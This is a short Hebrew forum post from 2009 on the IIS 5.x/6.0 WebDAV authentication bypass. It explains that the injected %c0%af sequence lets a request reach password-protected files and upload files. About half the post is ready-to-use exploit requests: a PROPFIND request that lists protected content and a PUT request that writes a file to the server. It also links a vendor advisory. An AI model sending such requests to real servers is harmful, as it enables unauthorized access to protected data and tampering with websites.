שרתים חשופים:
קוד:
Microsoft IIS 5.0 (Windows Server 2000).
Microsoft IIS 5.1 (Windows XP).
Microsoft IIS 6.0 (Windows Server 2003).
הרעיון ניצול מאוד דומה, מאפשר להגיע לקבצים מאחורי 401.2- שדורשים התחברות עם סיסמא, מאפשר להעלות קבצים לשרת- בקיצור, בלאגן רציני.
הפגיעה נוצרת כאשר השרת מפרש שאילתת GET למשל שהוזרקו אליה התווים הבאים:
קוד:
%c0%af
(הפירוש שלהם לאסקי יוצר את הבעיה)
דוגמא לשאילתת גישה לקבצים מאחורי סיסמה:
קוד:
PROPFIND /web%c0%afdav/ HTTP/1.1
Host: www.vulnerable.com
Connection: TE
TE: trailers
Depth: 1
Content-Length: 288
Content-Type: application/xml
<?xml version="1.0" encoding="utf-8"?>
<propfind xmlns="DAV:"><prop>
<getcontentlength xmlns="DAV:"/>
<getlastmodified xmlns="DAV:"/>
<executable xmlns="http://apache.org/dav/props/"/>
<resourcetype xmlns="DAV:"/>
<checked-in xmlns="DAV:"/>
<checked-out xmlns="DAV:"/>
</prop></propfind>
דוגמא לשאילתת להעלת קבצים לשרת:
קוד:
PUT /web%c0%afdav/foo.html HTTP/1.1
Host: www.vulnerable.com
Translate: f
Content-Length: 15
Content-Type: text/html
<h1>w00t!!</h1>
המידע נלקח מהבלוג של Trancer:
מומלץ להכנס ולהתעדכן בכל מה שנוגע לזה ולחדשות אחרות בנושא:
קוד:
http://www.rec-sec.com
המלצות של מייקרוסופט לפעולות עד שייצא טיפול בבעיה:
קוד:
http://www.microsoft.com/technet/security/advisory/971492.mspx
[ההודעה נערכה על-ידי cp77fk4r ב-21/05/2009 11:22:27]